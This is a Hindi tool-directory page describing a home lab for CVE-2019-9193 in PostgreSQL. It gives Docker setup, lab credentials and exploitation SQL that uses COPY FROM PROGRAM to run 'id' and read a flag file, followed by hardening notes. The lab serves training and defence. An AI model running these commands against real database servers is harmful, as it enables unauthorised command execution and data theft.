Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-9193-Home-Lab — यह लैब CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE का अनुकरण करता है | Kitploit
उपकरण/GitHubGitHub/netw0rk7/cve-2019-9193-home-lab
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाडेटाबेस सुरक्षालैब और अभ्यास
GitHubnetw0rk7/cve-2019-9193-home-lab

CVE-2019-9193-Home-Lab

यह लैब CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE का अनुकरण करता है

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-9193 — PostgreSQL COPY FROM PROGRAM RCE

CVE20199193-2

यह लैब CVE-2019-9193 का अनुकरण करती है, जो PostgreSQL 9.3–11.2 में एक कमजोरी है, जो अनुमति देती है:

root@kitploit:~
COPY ... FROM PROGRAM '<command>'

जब सुपरयूज़र या pg_execute_server_program रोल वाला उपयोगकर्ता इसे चलाता है तो OS कमांड निष्पादित करने की अनुमति मिलती है।

आपका कार्य इस सुविधा का शोषण करके निम्न फ़ाइल को पढ़ना है:

root@kitploit:~
/tmp/flag.txt

उद्देश्य

  1. PostgreSQL से कनेक्ट करें:
    • User: postgres
    • Password: sentinel7
    • Host port: 5433
  2. COPY FROM PROGRAM का उपयोग करें:
    • OS कमांड निष्पादित करने के लिए
    • फ़्लैग प्राप्त करने के लिए

आरंभ करना

root@kitploit:~
docker compose build
docker compose up -d

इसके माध्यम से कनेक्ट करें:

root@kitploit:~
psql -U postgres -h 127.0.0.1 -p 5433

शोषण

1) तालिका बनाएं

root@kitploit:~
CREATE TABLE cmd_exec(cmd_output text);

2) RCE परीक्षण करें

root@kitploit:~
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

3) फ़्लैग पढ़ें

root@kitploit:~
TRUNCATE cmd_exec;
COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
SELECT * FROM cmd_exec;

सुरक्षा नोट्स

  • PostgreSQL सुपरयूज़र का उपयोग करके एप्लिकेशन कभी न चलाएं
  • अनावश्यक रूप से pg_execute_server_program प्रदान न करें
  • COPY PROGRAM को अक्षम या प्रतिबंधित करें
  • एप्लिकेशन को SQL इंजेक्शन से सुरक्षित रखें
टूल डाउनलोड करें